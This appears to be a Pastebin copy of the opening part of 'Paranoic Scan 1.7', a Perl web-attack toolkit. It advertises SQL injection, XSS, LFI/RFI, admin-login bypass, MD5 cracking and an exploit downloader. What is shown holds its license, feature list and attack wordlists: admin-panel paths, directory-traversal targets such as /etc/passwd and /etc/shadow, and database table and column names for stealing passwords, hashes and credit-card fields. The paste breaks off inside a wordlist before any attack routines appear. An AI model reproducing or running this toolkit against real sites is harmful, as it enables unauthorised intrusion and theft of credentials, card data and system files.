Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!usr/bin/perl
- #################################################################################
- #This software is Copyright (c) 2014 by Doddy Hackman.
- #
- #This is free software, licensed under:
- #
- # The Artistic License 1.0
- #
- #The Artistic License
- #
- #Preamble
- #
- #The intent of this document is to state the conditions under which a Package
- #may be copied, such that the Copyright Holder maintains some semblance of
- #artistic control over the development of the package, while giving the users of
- #the package the right to use and distribute the Package in a more-or-less
- #customary fashion, plus the right to make reasonable modifications.
- #
- #Definitions:
- #
- # - "Package" refers to the collection of files distributed by the Copyright
- # Holder, and derivatives of that collection of files created through
- # textual modification.
- # - "Standard Version" refers to such a Package if it has not been modified,
- # or has been modified in accordance with the wishes of the Copyright
- # Holder.
- # - "Copyright Holder" is whoever is named in the copyright or copyrights for
- # the package.
- # - "You" is you, if you're thinking about copying or distributing this Package.
- # - "Reasonable copying fee" is whatever you can justify on the basis of media
- # cost, duplication charges, time of people involved, and so on. (You will
- # not be required to justify it to the Copyright Holder, but only to the
- # computing community at large as a market that must bear the fee.)
- # - "Freely Available" means that no fee is charged for the item itself, though
- # there may be fees involved in handling the item. It also means that
- # recipients of the item may redistribute it under the same conditions they
- # received it.
- #
- #1. You may make and give away verbatim copies of the source form of the
- #Standard Version of this Package without restriction, provided that you
- #duplicate all of the original copyright notices and associated disclaimers.
- #
- #2. You may apply bug fixes, portability fixes and other modifications derived
- #from the Public Domain or from the Copyright Holder. A Package modified in such
- #a way shall still be considered the Standard Version.
- #
- #3. You may otherwise modify your copy of this Package in any way, provided that
- #you insert a prominent notice in each changed file stating how and when you
- #changed that file, and provided that you do at least ONE of the following:
- #
- # a) place your modifications in the Public Domain or otherwise make them
- # Freely Available, such as by posting said modifications to Usenet or an
- # equivalent medium, or placing the modifications on a major archive site
- # such as ftp.uu.net, or by allowing the Copyright Holder to include your
- # modifications in the Standard Version of the Package.
- #
- # b) use the modified Package only within your corporation or organization.
- #
- # c) rename any non-standard executables so the names do not conflict with
- # standard executables, which must also be provided, and provide a separate
- # manual page for each non-standard executable that clearly documents how it
- # differs from the Standard Version.
- #
- # d) make other distribution arrangements with the Copyright Holder.
- #
- #4. You may distribute the programs of this Package in object code or executable
- #form, provided that you do at least ONE of the following:
- #
- # a) distribute a Standard Version of the executables and library files,
- # together with instructions (in the manual page or equivalent) on where to
- # get the Standard Version.
- #
- # b) accompany the distribution with the machine-readable source of the Package
- # with your modifications.
- #
- # c) accompany any non-standard executables with their corresponding Standard
- # Version executables, giving the non-standard executables non-standard
- # names, and clearly documenting the differences in manual pages (or
- # equivalent), together with instructions on where to get the Standard
- # Version.
- #
- # d) make other distribution arrangements with the Copyright Holder.
- #
- #5. You may charge a reasonable copying fee for any distribution of this
- #Package. You may charge any fee you choose for support of this Package. You
- #may not charge a fee for this Package itself. However, you may distribute this
- #Package in aggregate with other (possibly commercial) programs as part of a
- #larger (possibly commercial) software distribution provided that you do not
- #advertise this Package as a product of your own.
- #
- #6. The scripts and library files supplied as input to or produced as output
- #from the programs of this Package do not automatically fall under the copyright
- #of this Package, but belong to whomever generated them, and may be sold
- #commercially, and may be aggregated with this Package.
- #
- #7. C or perl subroutines supplied by you and linked into this Package shall not
- #be considered part of this Package.
- #
- #8. The name of the Copyright Holder may not be used to endorse or promote
- #products derived from this software without specific prior written permission.
- #
- #9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED
- #WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
- #MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
- #
- #The End
- #################################################################################
- #Paranoic Scan 1.7
- #(C) Doddy Hackman 2014
- #Necessary modules
- #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
- #ppm install http://trouchelle.com/ppm/Color-Output.ppd
- #ppm install http://www.eekboek.nl/dl/ppms/Crypt-SSLeay.ppd
- #http://search.cpan.org/~exiftool/Image-ExifTool-9.27/lib/Image/ExifTool.pod
- #ppm install http://trouchelle.com/ppm/Image-ExifTool.ppd
- #http://search.cpan.org/~timb/DBI-1.630/DBI.pm
- #http://search.cpan.org/~capttofu/DBD-mysql-4.025/lib/DBD/mysql.pm
- #The arrays are a collection of several I found on the web
- #
- #[++] Old Options
- #
- #Google & Bing Scanner that also scan :
- #
- # * XSS
- # * SQL GET / POST
- # * SQL GET
- # * SQL GET + Admin
- # * Directory listing
- # * MSSQL
- # * Jet Database
- # * Oracle
- # * LFI
- # * RFI
- # * Full Source Discloure
- # * HTTP Information
- # * SQLi Scanner
- # * Bypass Admin
- # * Exploit FSD Manager
- # * Paths Finder
- # * Locate IP
- # * Crack MD5
- # * Panel Finder
- # * Console
- #
- #[++] Fixes
- #
- #[+] Refresh of existing pages to crack md5
- #[+] Error scanner fsd
- #[+] Http error scanner scan
- #[+] Spaces between text too annoying
- #[+] Added array to bypass
- #[+] Failed to read from file
- #[+] Fixed google & bing scanner
- #
- #[++] New options
- #
- #[+] Generate all logs in a html file
- #[+] Incorporates random and new useragent
- #[+] Multi encoder / decoder :
- #
- # * Ascii
- # * Hex
- # * Url
- # * Bin To Text & Text To Bin
- #
- #[+] PortScanner
- #[+] HTTP FingerPrinting
- #[+] CSRF Tool
- #[+] Scan XSS
- #[+] Generator for XSS Bypass
- #[+] Generator tiny url links to
- #[+] Finder and downloader exploits on Exploit-DB
- #[+] Mysql Manager
- #[+] Tools LFI
- #
- #################################################################################
- use Color::Output;
- Color::Output::Init;
- use LWP::UserAgent;
- use URI::Escape;
- use IO::Socket;
- use URI::Split qw(uri_split);
- use URI::Escape;
- use File::Basename;
- use HTML::Form;
- use HTML::Parser;
- use HTML::LinkExtor;
- use HTML::Form;
- use Time::HiRes "usleep";
- use Image::ExifTool;
- use Digest::MD5 qw(md5_hex);
- use MIME::Base64;
- use DBI;
- use Cwd;
- $|++;
- ##
- ##Arrays
- my @agents = (
- 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0',
- 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
- 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
- 'Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0',
- 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1',
- 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
- 'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14',
- 'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27'
- );
- my @paneles = (
- 'admin/admin.asp', 'admin/login.asp',
- 'admin/index.asp', 'admin/admin.aspx',
- 'admin/login.aspx', 'admin/index.aspx',
- 'admin/webmaster.asp', 'admin/webmaster.aspx',
- 'asp/admin/index.asp', 'asp/admin/index.aspx',
- 'asp/admin/admin.asp', 'asp/admin/admin.aspx',
- 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx',
- 'admin/', 'login.asp',
- 'login.aspx', 'admin.asp',
- 'admin.aspx', 'webmaster.aspx',
- 'webmaster.asp', 'login/index.asp',
- 'login/index.aspx', 'login/login.asp',
- 'login/login.aspx', 'login/admin.asp',
- 'login/admin.aspx', 'administracion/index.asp',
- 'administracion/index.aspx', 'administracion/login.asp',
- 'administracion/login.aspx', 'administracion/webmaster.asp',
- 'administracion/webmaster.aspx', 'administracion/admin.asp',
- 'administracion/admin.aspx', 'php/admin/',
- 'admin/admin.php', 'admin/index.php',
- 'admin/login.php', 'admin/system.php',
- 'admin/ingresar.php', 'admin/administrador.php',
- 'admin/default.php', 'administracion/',
- 'administracion/index.php', 'administracion/login.php',
- 'administracion/ingresar.php', 'administracion/admin.php',
- 'administration/', 'administration/index.php',
- 'administration/login.php', 'administrator/index.php',
- 'administrator/login.php', 'administrator/system.php',
- 'system/', 'system/login.php',
- 'admin.php', 'login.php',
- 'administrador.php', 'administration.php',
- 'administrator.php', 'admin1.html',
- 'admin1.php', 'admin2.php',
- 'admin2.html', 'yonetim.php',
- 'yonetim.html', 'yonetici.php',
- 'yonetici.html', 'adm/',
- 'admin/account.php', 'admin/account.html',
- 'admin/index.html', 'admin/login.html',
- 'admin/home.php', 'admin/controlpanel.html',
- 'admin/controlpanel.php', 'admin.html',
- 'admin/cp.php', 'admin/cp.html',
- 'cp.php', 'cp.html',
- 'administrator/', 'administrator/index.html',
- 'administrator/login.html', 'administrator/account.html',
- 'administrator/account.php', 'administrator.html',
- 'login.html', 'modelsearch/login.php',
- 'moderator.php', 'moderator.html',
- 'moderator/login.php', 'moderator/login.html',
- 'moderator/admin.php', 'moderator/admin.html',
- 'moderator/', 'account.php',
- 'account.html', 'controlpanel/',
- 'controlpanel.php', 'controlpanel.html',
- 'admincontrol.php', 'admincontrol.html',
- 'adminpanel.php', 'adminpanel.html',
- 'admin1.asp', 'admin2.asp',
- 'yonetim.asp', 'yonetici.asp',
- 'admin/account.asp', 'admin/home.asp',
- 'admin/controlpanel.asp', 'admin/cp.asp',
- 'cp.asp', 'administrator/index.asp',
- 'administrator/login.asp', 'administrator/account.asp',
- 'administrator.asp', 'modelsearch/login.asp',
- 'moderator.asp', 'moderator/login.asp',
- 'moderator/admin.asp', 'account.asp',
- 'controlpanel.asp', 'admincontrol.asp',
- 'adminpanel.asp', 'fileadmin/',
- 'fileadmin.php', 'fileadmin.asp',
- 'fileadmin.html', 'administration.html',
- 'sysadmin.php', 'sysadmin.html',
- 'phpmyadmin/', 'myadmin/',
- 'sysadmin.asp', 'sysadmin/',
- 'ur-admin.asp', 'ur-admin.php',
- 'ur-admin.html', 'ur-admin/',
- 'Server.php', 'Server.html',
- 'Server.asp', 'Server/',
- 'wp-admin/', 'administr8.php',
- 'administr8.html', 'administr8/',
- 'administr8.asp', 'webadmin/',
- 'webadmin.php', 'webadmin.asp',
- 'webadmin.html', 'administratie/',
- 'admins/', 'admins.php',
- 'admins.asp', 'admins.html',
- 'administrivia/', 'Database_Administration/',
- 'WebAdmin/', 'useradmin/',
- 'sysadmins/', 'admin1/',
- 'system-administration/', 'administrators/',
- 'pgadmin/', 'directadmin/',
- 'staradmin/', 'ServerAdministrator/',
- 'SysAdmin/', 'administer/',
- 'LiveUser_Admin/', 'sys-admin/',
- 'typo3/', 'panel/',
- 'cpanel/', 'cPanel/',
- 'cpanel_file/', 'platz_login/',
- 'rcLogin/', 'blogindex/',
- 'formslogin/', 'autologin/',
- 'support_login/', 'meta_login/',
- 'manuallogin/', 'simpleLogin/',
- 'loginflat/', 'utility_login/',
- 'showlogin/', 'memlogin/',
- 'members/', 'login-redirect/',
- 'sub-login/', 'wp-login/',
- 'login1/', 'dir-login/',
- 'login_db/', 'xlogin/',
- 'smblogin/', 'customer_login/',
- 'UserLogin/', 'login-us/',
- 'acct_login/', 'admin_area/',
- 'bigadmin/', 'project-admins/',
- 'phppgadmin/', 'pureadmin/',
- 'sql-admin/', 'radmind/',
- 'openvpnadmin/', 'wizmysqladmin/',
- 'vadmind/', 'ezsqliteadmin/',
- 'hpwebjetadmin/', 'newsadmin/',
- 'adminpro/', 'Lotus_Domino_Admin/',
- 'bbadmin/', 'vmailadmin/',
- 'Indy_admin/', 'ccp14admin/',
- 'irc-macadmin/', 'banneradmin/',
- 'sshadmin/', 'phpldapadmin/',
- 'macadmin/', 'administratoraccounts/',
- 'admin4_account/', 'admin4_colon/',
- 'radmind-1/', 'Super-Admin/',
- 'AdminTools/', 'cmsadmin/',
- 'SysAdmin2/', 'globes_admin/',
- 'cadmins/', 'phpSQLiteAdmin/',
- 'navSiteAdmin/', 'server_admin_small/',
- 'logo_sysadmin/', 'server/',
- 'database_administration/', 'power_user/',
- 'system_administration/', 'ss_vms_admin_sm/'
- );
- #my @files = ("/opt/lampp/htdocs/fofo.txt","/opt/lampp/htdocs/fofo.txt");
- my @files = (
- 'C:/xampp/htdocs/aca.txt',
- '../lfi.php',
- 'C:/xampp/htdocs/admin.php',
- 'C:/xampp/htdocs/leer.txt',
- '../../../boot.ini',
- '../../../../boot.ini',
- '../../../../../boot.ini',
- '../../../../../../boot.ini',
- '/etc/passwd',
- '/etc/shadow',
- '/etc/shadow~',
- '/etc/hosts',
- '/etc/motd',
- '/etc/apache/apache.conf',
- '/etc/fstab',
- '/etc/apache2/apache2.conf',
- '/etc/apache/httpd.conf',
- '/etc/httpd/conf/httpd.conf',
- '/etc/apache2/httpd.conf',
- '/etc/apache2/sites-available/default',
- '/etc/mysql/my.cnf',
- '/etc/my.cnf',
- '/etc/sysconfig/network-scripts/ifcfg-eth0',
- '/etc/redhat-release',
- '/etc/httpd/conf.d/php.conf',
- '/etc/pam.d/proftpd',
- '/etc/phpmyadmin/config.inc.php',
- '/var/www/config.php',
- '/etc/httpd/logs/error_log',
- '/etc/httpd/logs/error.log',
- '/etc/httpd/logs/access_log',
- '/etc/httpd/logs/access.log',
- '/var/log/apache/error_log',
- '/var/log/apache/error.log',
- '/var/log/apache/access_log',
- '/var/log/apache/access.log',
- '/var/log/apache2/error_log',
- '/var/log/apache2/error.log',
- '/var/log/apache2/access_log',
- '/var/log/apache2/access.log',
- '/var/www/logs/error_log',
- '/var/www/logs/error.log',
- '/var/www/logs/access_log',
- '/var/www/logs/access.log',
- '/usr/local/apache/logs/error_log',
- '/usr/local/apache/logs/error.log',
- '/usr/local/apache/logs/access_log',
- '/usr/local/apache/logs/access.log',
- '/var/log/error_log',
- '/var/log/error.log',
- '/var/log/access_log',
- '/var/log/access.log',
- '/etc/group',
- '/etc/security/group',
- '/etc/security/passwd',
- '/etc/security/user',
- '/etc/security/environ',
- '/etc/security/limits',
- '/usr/lib/security/mkuser.default',
- '/apache/logs/access.log',
- '/apache/logs/error.log',
- '/etc/httpd/logs/acces_log',
- '/etc/httpd/logs/acces.log',
- '/var/log/httpd/access_log',
- '/var/log/httpd/error_log',
- '/apache2/logs/error.log',
- '/apache2/logs/access.log',
- '/logs/error.log',
- '/logs/access.log',
- '/usr/local/apache2/logs/access_log',
- '/usr/local/apache2/logs/access.log',
- '/usr/local/apache2/logs/error_log',
- '/usr/local/apache2/logs/error.log',
- '/var/log/httpd/access.log',
- '/var/log/httpd/error.log',
- '/opt/lampp/logs/access_log',
- '/opt/lampp/logs/error_log',
- '/opt/xampp/logs/access_log',
- '/opt/xampp/logs/error_log',
- '/opt/lampp/logs/access.log',
- '/opt/lampp/logs/error.log',
- '/opt/xampp/logs/access.log',
- '/opt/xampp/logs/error.log',
- 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
- 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
- '/usr/local/apache/conf/httpd.conf',
- '/usr/local/apache2/conf/httpd.conf',
- '/etc/apache/conf/httpd.conf',
- '/usr/local/etc/apache/conf/httpd.conf',
- '/usr/local/apache/httpd.conf',
- '/usr/local/apache2/httpd.conf',
- '/usr/local/httpd/conf/httpd.conf',
- '/usr/local/etc/apache2/conf/httpd.conf',
- '/usr/local/etc/httpd/conf/httpd.conf',
- '/usr/apache2/conf/httpd.conf',
- '/usr/apache/conf/httpd.conf',
- '/usr/local/apps/apache2/conf/httpd.conf',
- '/usr/local/apps/apache/conf/httpd.conf',
- '/etc/apache2/conf/httpd.conf',
- '/etc/http/conf/httpd.conf',
- '/etc/httpd/httpd.conf',
- '/etc/http/httpd.conf',
- '/etc/httpd.conf',
- '/opt/apache/conf/httpd.conf',
- '/opt/apache2/conf/httpd.conf',
- '/var/www/conf/httpd.conf',
- '/private/etc/httpd/httpd.conf',
- '/private/etc/httpd/httpd.conf.default',
- '/Volumes/webBackup/opt/apache2/conf/httpd.conf',
- '/Volumes/webBackup/private/etc/httpd/httpd.conf',
- '/Volumes/webBackup/private/etc/httpd/httpd.conf.default',
- 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
- 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf',
- 'C:\ProgramFiles\xampp\apache\conf\httpd.conf',
- '/usr/local/php/httpd.conf.php',
- '/usr/local/php4/httpd.conf.php',
- '/usr/local/php5/httpd.conf.php',
- '/usr/local/php/httpd.conf',
- '/usr/local/php4/httpd.conf',
- '/usr/local/php5/httpd.conf',
- '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
- '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',
- '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
- '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',
- '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',
- '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
- '/usr/local/etc/apache/vhosts.conf',
- '/etc/php.ini',
- '/bin/php.ini',
- '/etc/httpd/php.ini',
- '/usr/lib/php.ini',
- '/usr/lib/php/php.ini',
- '/usr/local/etc/php.ini',
- '/usr/local/lib/php.ini',
- '/usr/local/php/lib/php.ini',
- '/usr/local/php4/lib/php.ini',
- '/usr/local/php5/lib/php.ini',
- '/usr/local/apache/conf/php.ini',
- '/etc/php4.4/fcgi/php.ini',
- '/etc/php4/apache/php.ini',
- '/etc/php4/apache2/php.ini',
- '/etc/php5/apache/php.ini',
- '/etc/php5/apache2/php.ini',
- '/etc/php/php.ini',
- '/etc/php/php4/php.ini',
- '/etc/php/apache/php.ini',
- '/etc/php/apache2/php.ini',
- '/web/conf/php.ini',
- '/usr/local/Zend/etc/php.ini',
- '/opt/xampp/etc/php.ini',
- '/var/local/www/conf/php.ini',
- '/etc/php/cgi/php.ini',
- '/etc/php4/cgi/php.ini',
- '/etc/php5/cgi/php.ini',
- 'c:\php5\php.ini',
- 'c:\php4\php.ini',
- 'c:\php\php.ini',
- 'c:\PHP\php.ini',
- 'c:\WINDOWS\php.ini',
- 'c:\WINNT\php.ini',
- 'c:\apache\php\php.ini',
- 'c:\xampp\apache\bin\php.ini',
- 'c:\NetServer\bin\stable\apache\php.ini',
- 'c:\home2\bin\stable\apache\php.ini',
- 'c:\home\bin\stable\apache\php.ini',
- '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
- '/usr/local/cpanel/logs',
- '/usr/local/cpanel/logs/stats_log',
- '/usr/local/cpanel/logs/access_log',
- '/usr/local/cpanel/logs/error_log',
- '/usr/local/cpanel/logs/license_log',
- '/usr/local/cpanel/logs/login_log',
- '/var/cpanel/cpanel.config',
- '/var/log/mysql/mysql-bin.log',
- '/var/log/mysql.log',
- '/var/log/mysqlderror.log',
- '/var/log/mysql/mysql.log',
- '/var/log/mysql/mysql-slow.log',
- '/var/mysql.log',
- '/var/lib/mysql/my.cnf',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
- 'C:\ProgramFiles\MySQL\data\hostname.err',
- 'C:\ProgramFiles\MySQL\data\mysql.log',
- 'C:\ProgramFiles\MySQL\data\mysql.err',
- 'C:\ProgramFiles\MySQL\data\mysql-bin.log',
- 'C:\MySQL\data\hostname.err',
- 'C:\MySQL\data\mysql.log',
- 'C:\MySQL\data\mysql.err',
- 'C:\MySQL\data\mysql-bin.log',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini',
- 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf',
- 'C:\ProgramFiles\MySQL\my.ini',
- 'C:\ProgramFiles\MySQL\my.cnf',
- 'C:\MySQL\my.ini',
- 'C:\MySQL\my.cnf',
- '/etc/logrotate.d/proftpd',
- '/www/logs/proftpd.system.log',
- '/var/log/proftpd',
- '/etc/proftp.conf',
- '/etc/protpd/proftpd.conf',
- '/etc/vhcs2/proftpd/proftpd.conf',
- '/etc/proftpd/modules.conf',
- '/var/log/vsftpd.log',
- '/etc/vsftpd.chroot_list',
- '/etc/logrotate.d/vsftpd.log',
- '/etc/vsftpd/vsftpd.conf',
- '/etc/vsftpd.conf',
- '/etc/chrootUsers',
- '/var/log/xferlog',
- '/var/adm/log/xferlog',
- '/etc/wu-ftpd/ftpaccess',
- '/etc/wu-ftpd/ftphosts',
- '/etc/wu-ftpd/ftpusers',
- '/usr/sbin/pure-config.pl',
- '/usr/etc/pure-ftpd.conf',
- '/etc/pure-ftpd/pure-ftpd.conf',
- '/usr/local/etc/pure-ftpd.conf',
- '/usr/local/etc/pureftpd.pdb',
- '/usr/local/pureftpd/etc/pureftpd.pdb',
- '/usr/local/pureftpd/sbin/pure-config.pl',
- '/usr/local/pureftpd/etc/pure-ftpd.conf',
- '/etc/pure-ftpd/pure-ftpd.pdb',
- '/etc/pureftpd.pdb',
- '/etc/pureftpd.passwd',
- '/etc/pure-ftpd/pureftpd.pdb',
- '/var/log/pure-ftpd/pure-ftpd.log',
- '/logs/pure-ftpd.log',
- '/var/log/pureftpd.log',
- '/var/log/ftp-proxy/ftp-proxy.log',
- '/var/log/ftp-proxy',
- '/var/log/ftplog',
- '/etc/logrotate.d/ftp',
- '/etc/ftpchroot',
- '/etc/ftphosts',
- '/var/log/exim_mainlog',
- '/var/log/exim/mainlog',
- '/var/log/maillog',
- '/var/log/exim_paniclog',
- '/var/log/exim/paniclog',
- '/var/log/exim/rejectlog',
- '/var/log/exim_rejectlog'
- );
- my @buscar1 = (
- 'usuario', 'web_users',
- 'name', 'names',
- 'nombre', 'nombres',
- 'usuarios', 'member',
- 'members', 'admin_table',
- 'usuaris', 'admin',
- 'tblUsers', 'tblAdmin',
- 'user', 'users',
- 'username', 'usernames',
- 'web_usuarios', 'miembro',
- 'miembros', 'membername',
- 'admins', 'administrator',
- 'sign', 'config',
- 'USUARIS', 'cms_operadores',
- 'administrators', 'passwd',
- 'password', 'passwords',
- 'pass', 'Pass',
- 'mpn_authors', 'author',
- 'musuario', 'mysql.user',
- 'user_names', 'foro',
- 'tAdmin', 'tadmin',
- 'user_password', 'user_passwords',
- 'user_name', 'member_password',
- 'mods', 'mod',
- 'moderators', 'moderator',
- 'user_email', 'jos_users',
- 'mb_user', 'host',
- 'apellido_nombre', 'user_emails',
- 'user_mail', 'user_mails',
- 'mail', 'emails',
- 'email', 'address',
- 'jos_usuarios', 'tutorial_user_auth',
- 'e-mail', 'emailaddress',
- 'correo', 'correos',
- 'phpbb_users', 'log',
- 'logins', 'login',
- 'tbl_usuarios', 'user_auth',
- 'login_radio', 'registers',
- 'register', 'usr',
- 'usrs', 'ps',
- 'pw', 'un',
- 'u_name', 'u_pass',
- 'tbl_admin', 'usuarios_head',
- 'tpassword', 'tPassword',
- 'u_password', 'nick',
- 'nicks', 'manager',
- 'managers', 'administrador',
- 'BG_CMS_Users', 'tUser',
- 'tUsers', 'administradores',
- 'clave', 'login_id',
- 'pwd', 'pas',
- 'sistema_id', 'foro_usuarios',
- 'cliente', 'sistema_usuario',
- 'sistema_password', 'contrasena',
- 'auth', 'key',
- 'senha', 'signin',
- 'dir_admin', 'alias',
- 'clientes', 'tb_admin',
- 'tb_administrator', 'tb_login',
- 'tb_logon', 'tb_members_tb_member',
- 'calendar_users', 'cursos',
- 'tb_users', 'tb_user',
- 'tb_sys', 'sys',
- 'fazerlogon', 'logon',
- 'fazer', 'authorization',
- 'curso', 'membros',
- 'utilizadores', 'staff',
- 'nuke_authors', 'accounts',
- 'account', 'accnts',
- 'signup', 'leads',
- 'lead', 'associated',
- 'accnt', 'customers',
- 'customer', 'membres',
- 'administrateur', 'utilisateur',
- 'riacms_users', 'tuser',
- 'tusers', 'utilisateurs',
- 'amministratore', 'god',
- 'God', 'authors',
- 'wp_users', 'tb_usuarios',
- 'asociado', 'asociados',
- 'autores', 'autor',
- 'Users', 'Admin',
- 'Members', 'tb_usuario',
- 'Miembros', 'Usuario',
- 'Usuarios', 'ADMIN',
- 'USERS', 'USER',
- 'MEMBER', 'MEMBERS',
- 'USUARIO', 'USUARIOS',
- 'MIEMBROS', 'MIEMBRO',
- 'USR_NAME', 'about',
- 'access', 'admin_id',
- 'admin_name', 'admin_pass',
- 'admin_passwd', 'admin_password',
- 'admin_pwd', 'admin_user',
- 'admin_userid', 'admin_username',
- 'adminemail', 'adminid',
- 'administrator_name', 'adminlogin',
- 'adminmail', 'adminname',
- 'adminuser', 'adminuserid',
- 'adminusername', 'aid',
- 'aim', 'apwd',
- 'auid', 'authenticate',
- 'authentication', 'blog',
- 'cc_expires', 'cc_number',
- 'cc_owner', 'cc_type',
- 'cfg', 'cid',
- 'clientname', 'clientpassword',
- 'clientusername', 'conf',
- 'contact', 'converge_pass_hash',
- 'converge_pass_salt', 'crack',
- 'customers_email_address', 'customers_password',
- 'cvvnumber]', 'data',
- 'db_database_name', 'db_hostname',
- 'db_password', 'db_username',
- 'download', 'e_mail',
- 'emer', 'emni',
- 'emniplote', 'emri',
- 'fjalekalimi', 'fjalekalimin',
- 'full', 'gid',
- 'group', 'group_name',
- 'hash', 'hashsalt',
- 'homepage', 'icq',
- 'icq_number', 'id',
- 'id_group', 'id_member',
- 'images', 'ime',
- 'index', 'ip_address',
- 'kodi', 'korisnici',
- 'korisnik', 'kpro_user',
- 'last_ip', 'last_login',
- 'lastname', 'llogaria',
- 'login_admin', 'login_name',
- 'login_pass', 'login_passwd',
- 'login_password', 'login_pw',
- 'login_pwd', 'login_user',
- 'login_username', 'logini',
- 'loginkey', 'loginout',
- 'logo', 'logohu',
- 'lozinka', 'md5hash',
- 'mem_login', 'mem_pass',
- 'mem_passwd', 'mem_password',
- 'mem_pwd', 'member_id',
- 'member_login_key', 'member_name',
- 'memberid', 'memlogin',
- 'mempassword', 'my_email',
- 'my_name', 'my_password',
- 'my_username', 'myname',
- 'mypassword', 'myusername',
- 'nc', 'new',
- 'news', 'number',
- 'nummer', 'p_assword',
- 'p_word', 'pass_hash',
- 'pass_w', 'pass_word',
- 'pass1word', 'passw',
- 'passwordsalt', 'passwort',
- 'passwrd', 'perdorimi',
- 'perdoruesi', 'personal_key',
- 'phone', 'privacy',
- 'psw', 'punetoret',
- 'punonjes', 'pword',
- 'pwrd', 'salt',
- 'search', 'secretanswer',
- 'search', 'secretanswer',
- 'secretquestion', 'serial',
- 'session_member_id', 'session_member_login_key',
- 'sesskey', 'setting',
- 'sid', 'sifra',
- 'spacer', 'status',
- 'store', 'store1',
- 'store2', 'store3',
- 'store4', 'table_prefix',
- 'temp_pass', 'temp_password',
- 'temppass', 'temppasword',
- 'text', 'uid',
- 'uname', 'user_admin',
- 'user_icq', 'user_id',
- 'user_ip', 'user_level',
- 'user_login', 'user_n',
- 'user_pass', 'user_passw',
- 'user_passwd', 'user_pw',
- 'user_pwd', 'user_pword',
- 'user_pwrd', 'user_un',
- 'user_uname', 'user_username',
- 'user_usernm', 'user_usernun',
- 'user_usrnm', 'user1',
- 'useradmin', 'userid',
- 'userip', 'userlogin',
- 'usern', 'usernm',
- 'userpass', 'userpassword',
- 'userpw', 'userpwd',
- 'usr_n', 'usr_name',
- 'usr_pass', 'usr2',
- 'usrn', 'usrnam',
- 'usrname', 'usrnm',
- 'usrpass', 'warez',
- 'xar_name', 'xar_pass',
- 'nom dutilisateur', 'mot de passe',
- 'compte', 'comptes',
- 'aide', 'objectif',
- 'authentifier', 'authentification',
- 'Contact', 'fissure',
- 'client', 'clients',
- 'de donn?es', 'mot_de_passe_bdd',
- 't?l?charger', 'E-mail',
- 'adresse e-mail', 'Emer',
- 'complet', 'groupe',
- 'hachage', 'Page daccueil',
- 'Kodi', 'nom',
- 'connexion', 'membre',
- 'MEMBERNAME', 'mon_mot_de_passe',
- 'monmotdepasse', 'ignatiusj',
- 'caroline-du-nord', 'nouveau',
- 'Nick', 'passer',
- 'Passw', 'Mot de passe',
- 't?l?phone', 'protection de la vie priv?e',
- 'PSW', 'pWord',
- 'sel', 'recherche',
- 'de s?rie', 'param?tre',
- '?tat', 'stocker',
- 'texte', 'cvvnumber'
- );
- my @buscar2 = (
- 'name', 'user',
- 'user_name', 'user_username',
- 'uname', 'user_uname',
- 'usern', 'user_usern',
- 'un', 'user_un',
- 'mail', 'cliente',
- 'usrnm', 'user_usrnm',
- 'usr', 'admin_name',
- 'cla_adm', 'usu_adm',
- 'fazer', 'logon',
- 'fazerlogon', 'authorization',
- 'membros', 'utilizadores',
- 'sysadmin', 'email',
- 'senha', 'username',
- 'usernm', 'user_usernm',
- 'nm', 'user_nm',
- 'login', 'u_name',
- 'nombre', 'host',
- 'pws', 'cedula',
- 'userName', 'host_password',
- 'chave', 'alias',
- 'apellido_nombre', 'cliente_nombre',
- 'cliente_email', 'cliente_pass',
- 'cliente_user', 'cliente_usuario',
- 'login_id', 'sistema_id',
- 'author', 'user_login',
- 'admin_user', 'admin_pass',
- 'uh_usuario', 'uh_password',
- 'psw', 'host_username',
- 'sistema_usuario', 'auth',
- 'key', 'usuarios_nombre',
- 'usuarios_nick', 'usuarios_password',
- 'user_clave', 'membername',
- 'nme', 'unme',
- 'password', 'user_password',
- 'autores', 'pass_hash',
- 'hash', 'pass',
- 'correo', 'usuario_nombre',
- 'usuario_nick', 'usuario_password',
- 'userpass', 'user_pass',
- 'upw', 'pword',
- 'user_pword', 'passwd',
- 'user_passwd', 'passw',
